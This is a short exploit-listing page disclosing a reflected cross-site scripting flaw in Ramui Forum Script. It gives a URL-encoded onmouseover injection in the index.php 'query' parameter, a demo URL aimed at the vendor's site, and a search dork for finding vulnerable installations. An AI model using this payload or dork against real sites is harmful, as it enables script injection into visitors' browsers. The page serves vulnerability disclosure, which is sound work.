Ramui Forum Script Cross Site Scripting

2012.05.08

Credit: 3spi0n

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

Dork: \"Powered by: Ramui forum script\"

# Exploit Title; Ramui Forum Script Cross Site Scripting Vulnerability [pixlie.php]
# Date ; 7/5/12
# Author ; 3spi0n
# Script Vendor or Software Link ; www.ramui.com - www.hotscripts.com/listing/ramui-forum-script/
# Category ; Webapps
# Type ; Cross Site Scripting (XSS)
# Tested on ; Ubuntu / Win7 / Backtrack
[#] Script Details ;
- Demo ; forumscript.ramui.com
[#] Demo Analyzing ;
http://forumscript.ramui.com//gb/user/index.php?query=%22%20onmouseover%3dprompt%28991522%29%20bad%3d%22
[#] Vulnerable Details ;
- Xss Vulnerable on sites
- Vulnerable File ; index.php?query= [query, variant of index.php file]
Exploit ;
/index.php?query=%22%20onmouseover%3dprompt%28991522%29%20bad%3d%22
[#] Dorks ;
- "Powered by: Ramui forum script"
[#] Greetz ;
- X-BL4CKERZ INC.
- My Official Blog, www.Ryuzaki.in
- Facebook.Com/3spi0ne - Twitter.Com/RigidusCO

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Ramui Forum Script Cross Site Scripting

Dork: \"Powered by: Ramui forum script\"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.